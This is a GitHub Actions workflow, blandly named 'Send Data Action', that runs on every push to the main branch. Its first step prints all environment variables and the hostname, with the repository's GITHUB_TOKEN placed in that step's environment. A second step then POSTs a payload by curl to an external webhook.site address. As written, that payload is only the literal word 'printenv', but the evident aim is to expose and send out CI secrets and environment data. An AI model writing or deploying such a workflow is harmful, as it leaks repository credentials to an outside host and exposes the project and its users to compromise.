name: Send Data Action
on:
  push:
    branches:
      - main

jobs:
  send-data:
    runs-on: ubuntu-latest

    steps:
      - name: Set up environment
        run: printenv && echo $GITHUB_ENV && echo $HOSTNAME
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Send Data
        run: |
          curl -X POST -H "Content-Type: application/json" -d '{"data":  printenv}' "https://webhook.site/69093177-00be-4ea9-9942-125c58ff89ca"
